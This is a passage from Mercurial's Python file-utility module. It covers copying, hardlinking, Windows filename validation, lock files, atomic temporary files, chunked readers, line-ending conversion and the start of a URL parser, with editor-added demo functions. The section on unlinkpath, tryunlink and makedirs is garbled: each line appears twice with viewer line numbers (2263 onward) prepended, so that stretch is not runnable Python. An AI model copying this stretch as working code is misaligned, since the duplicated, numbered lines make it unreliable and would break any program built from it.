        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (
                            oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(str(inst))

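# Editor's illustrative sketch (not part of the original module): a plain
# copyfile() round trip in a scratch directory. readfile()/writefile() are
# defined later in this module; they are resolved at call time.
def _democopyfile():
    import tempfile
    d = tempfile.mkdtemp()
    src = os.path.join(d, 'src')
    dst = os.path.join(d, 'dst')
    writefile(src, b'data')
    copyfile(src, dst)
    assert readfile(dst) == b'data'
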
def copyfiles(src, dst, hardlink=None, progress=None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    def settopic():
        if progress:
            progress.topic = _('linking') if hardlink else _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        if progress:
            progress.increment()

    return hardlink, num

_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    timer = time.perf_counter

def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)

def readlock(pathname):
    try:
        return readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    with posixfile(pathname, 'rb') as fp:
        return fp.read()

def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)

# File system features

def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True

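# Editor's illustrative sketch (not part of the original module): probe a
# scratch directory for case sensitivity. The result depends on the host
# filesystem (e.g. typically True on Linux ext4, False on default macOS APFS).
# writefile() is defined later in this module and resolved at call time.
def _demofscasesensitive():
    import tempfile
    d = tempfile.mkdtemp()
    p = os.path.join(d, 'CaseProbe')   # a foldable final component
    writefile(p, b'')
    return fscasesensitive(p)
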
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()

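# Editor's illustrative sketch (not part of the original module): the
# module-level `re` object transparently prefers re2 when it is installed
# and falls back to the stdlib engine (remod) otherwise; callers don't care
# which engine compiled the pattern.
def _demore():
    pat = re.compile(br'ab+c')
    assert pat.match(b'abbc')
    assert pat.match(b'ac') is None   # 'ab+c' requires at least one 'b'
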
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # (Assign the result: str.replace() does not mutate in place.)
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patch of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)

def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass

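# Editor's illustrative sketch (not part of the original module): probe whether
# hardlink counts are reported reliably next to a file we control. writefile()
# is defined later in this module and resolved at call time; the result is
# True on most local POSIX filesystems.
def _demochecknlink():
    import tempfile
    d = tempfile.mkdtemp()
    probe = os.path.join(d, 'probe')
    writefile(probe, b'x')
    return checknlink(probe)
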
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative to a simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode, enforcewritable)

    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp

class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        a change due to a collision between such mtimes.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other

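# Editor's illustrative sketch (not part of the original module): detecting and
# resolving an ambiguous stat between two quick same-size writes. writefile()
# is defined later in this module and resolved at call time.
def _demofilestat():
    import tempfile
    d = tempfile.mkdtemp()
    p = os.path.join(d, 'f')
    writefile(p, b'one')
    old = filestat.frompath(p)
    writefile(p, b'two')            # same size, likely the same ctime second
    new = filestat.frompath(p)
    if new.isambig(old):
        # advance mtime so a later size/ctime/mtime comparison sees a change
        new.avoidambig(p, old)
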
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode,
                                    enforcewritable=('w' in mode))

        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()

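# Editor's illustrative sketch (not part of the original module): an atomic
# write via the context manager protocol; nothing is visible at the target
# name until close() renames the temporary file into place. readfile() is
# defined just below and resolved at call time.
def _demoatomictempfile():
    import tempfile
    d = tempfile.mkdtemp()
    p = os.path.join(d, 'target')
    with atomictempfile(p) as fp:
        fp.write(b'all or nothing')
        assert not os.path.exists(p)   # not yet renamed into place
    assert readfile(p) == b'all or nothing'
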
2263 def unlinkpath(f, ignoremissing=False, rmdir=True):
2263 def unlinkpath(f, ignoremissing=False, rmdir=True):
2264 """unlink and remove the directory if it is empty"""
2264 """unlink and remove the directory if it is empty"""
2265 if ignoremissing:
2265 if ignoremissing:
2266 tryunlink(f)
2266 tryunlink(f)
2267 else:
2267 else:
2268 unlink(f)
2268 unlink(f)
2269 if rmdir:
2269 if rmdir:
2270 # try removing directories that might now be empty
2270 # try removing directories that might now be empty
2271 try:
2271 try:
2272 removedirs(os.path.dirname(f))
2272 removedirs(os.path.dirname(f))
2273 except OSError:
2273 except OSError:
2274 pass
2274 pass
2275
2275
2276 def tryunlink(f):
2276 def tryunlink(f):
2277 """Attempt to remove a file, ignoring ENOENT errors."""
2277 """Attempt to remove a file, ignoring ENOENT errors."""
2278 try:
2278 try:
2279 unlink(f)
2279 unlink(f)
2280 except OSError as e:
2280 except OSError as e:
2281 if e.errno != errno.ENOENT:
2281 if e.errno != errno.ENOENT:
2282 raise
2282 raise
2283
2283
2284 def makedirs(name, mode=None, notindexed=False):
2284 def makedirs(name, mode=None, notindexed=False):
2285 """recursive directory creation with parent mode inheritance
2285 """recursive directory creation with parent mode inheritance
2286
2286
2287 Newly created directories are marked as "not to be indexed by
2287 Newly created directories are marked as "not to be indexed by
2288 the content indexing service", if ``notindexed`` is specified
2288 the content indexing service", if ``notindexed`` is specified
2289 for "write" mode access.
2289 for "write" mode access.
2290 """
2290 """
2291 try:
2291 try:
2292 makedir(name, notindexed)
2292 makedir(name, notindexed)
2293 except OSError as err:
2293 except OSError as err:
2294 if err.errno == errno.EEXIST:
2294 if err.errno == errno.EEXIST:
2295 return
2295 return
2296 if err.errno != errno.ENOENT or not name:
2296 if err.errno != errno.ENOENT or not name:
2297 raise
2297 raise
2298 parent = os.path.dirname(os.path.abspath(name))
2298 parent = os.path.dirname(os.path.abspath(name))
2299 if parent == name:
2299 if parent == name:
2300 raise
2300 raise
2301 makedirs(parent, mode, notindexed)
2301 makedirs(parent, mode, notindexed)
2302 try:
2302 try:
2303 makedir(name, notindexed)
2303 makedir(name, notindexed)
2304 except OSError as err:
2304 except OSError as err:
2305 # Catch EEXIST to handle races
2305 # Catch EEXIST to handle races
2306 if err.errno == errno.EEXIST:
2306 if err.errno == errno.EEXIST:
2307 return
2307 return
2308 raise
2308 raise
2309 if mode is not None:
2309 if mode is not None:
2310 os.chmod(name, mode)
2310 os.chmod(name, mode)
2311
2311
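# Usage sketch (editor's illustration, not part of the original module;
# the path is hypothetical). Missing ancestors are created recursively,
# EEXIST from concurrent creation is swallowed, and ``mode`` is applied
# to each directory this call creates:
#
#     from mercurial import util
#     util.makedirs(b'build/output/logs', mode=0o755)
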
def readfile(path):
    with open(path, 'rb') as fp:
        return fp.read()

def writefile(path, text):
    with open(path, 'wb') as fp:
        fp.write(text)

def appendfile(path, text):
    with open(path, 'ab') as fp:
        fp.write(text)

class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If the size parameter is omitted, read everything."""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)

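# Usage sketch (editor's illustration, not part of the original module):
# reads spanning chunk boundaries are stitched together transparently.
#
#     from mercurial import util
#     buf = util.chunkbuffer(iter([b'abc', b'defgh']))
#     buf.read(4)   # -> 'abcd', spans the first two input chunks
#     buf.read()    # -> 'efgh', drains the rest of the iterator
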
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s

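# Usage sketch (editor's illustration, not part of the original module;
# the byte counts assume a 300000-byte source and the default chunk size):
#
#     import io
#     from mercurial import util
#     fp = io.BytesIO(b'x' * 300000)
#     [len(c) for c in util.filechunkiter(fp)]  # -> [131072, 131072, 37856]
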
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0:len(res)] = res
        return len(res)

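# Usage sketch (editor's illustration, not part of the original module):
# once the cap is consumed, further reads behave like EOF.
#
#     import io
#     from mercurial import util
#     capped = util.cappedreader(io.BytesIO(b'0123456789'), 4)
#     capped.read()   # -> '0123' (only 4 bytes allowed)
#     capped.read()   # -> ''     (limit reached, treated as EOF)
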
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go

def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
      ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
      ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline

bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )

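# Usage sketch (editor's illustration, not part of the original module):
# the unit table above is scanned top to bottom and the first matching
# entry wins, so the displayed precision shrinks as the value grows.
#
#     from mercurial import util
#     util.bytecount(1024)         # -> '1.00 KB'
#     util.bytecount(150 * 1024)   # -> '150 KB'
#     util.bytecount(2 << 30)      # -> '2.00 GB'
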
class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        return self._fp.write(self._encode(data))

# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    return _eolre.sub('\n', s)

def tocrlf(s):
    return _eolre.sub('\r\n', s)

def _crlfwriter(fp):
    return transformingwriter(fp, tocrlf)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity

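# Usage sketch (editor's illustration, not part of the original module):
# on a POSIX host the ``*nativeeol`` names are identity functions; on
# Windows they convert line endings.
#
#     from mercurial import util
#     util.tocrlf(b'a\nb\n')    # -> 'a\r\nb\r\n'
#     util.tolf(b'a\r\nb\n')    # -> 'a\nb\n'
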
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp

def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line

def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)

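# Usage sketch (editor's illustration, not part of the original module;
# the mapping and input string are made up):
#
#     from mercurial import util
#     util.interpolate(b'%', {b'foo': b'bar'}, b'say %foo')  # -> 'say bar'
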
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(_("no port number associated with service '%s'")
                          % port)

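# Usage sketch (editor's illustration, not part of the original module;
# the service lookup depends on the host's services database):
#
#     from mercurial import util
#     util.getport(b'8000')   # -> 8000
#     util.getport(b'http')   # -> typically 80, via socket.getservbyname()
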
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
